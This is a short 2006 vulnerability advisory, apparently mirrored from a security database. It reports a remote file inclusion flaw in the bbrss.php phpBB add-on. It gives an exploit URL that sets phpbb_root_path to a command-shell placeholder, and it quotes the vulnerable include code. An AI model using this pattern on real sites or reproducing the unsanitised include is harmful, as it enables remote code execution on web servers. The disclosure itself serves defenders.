Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:13183
HistoryJun 15, 2006 - 12:00 a.m.

bbrss PhpBB (phpbb_root_path) Remote File Inclusion

2006-06-1500:00:00
vulners.com
9

######################################################

bbrss PhpBB (phpbb_root_path) Remote File Inclusion

######################################################

Credit : SpC-x | The_BeKiR

Site : http://wWw.SaVSaK.CoM

######################################################

Greetz :

| The_BeKiR | Nukedx | Ejder | Str0ke | joffer | Poizonb0x |

######################################################

Remote File Inclusion :

http://www.target.com/path/bbrss.php?phpbb_root_path=Command*Shell

Bbrss.PHP :

define('IN_PHPBB', true); // to ensure your script works ! //
$phpbb_root_path = './';
include_once($phpbb_root_path . 'extension.inc');
include_once($phpbb_root_path . 'common.php');

/SpC-x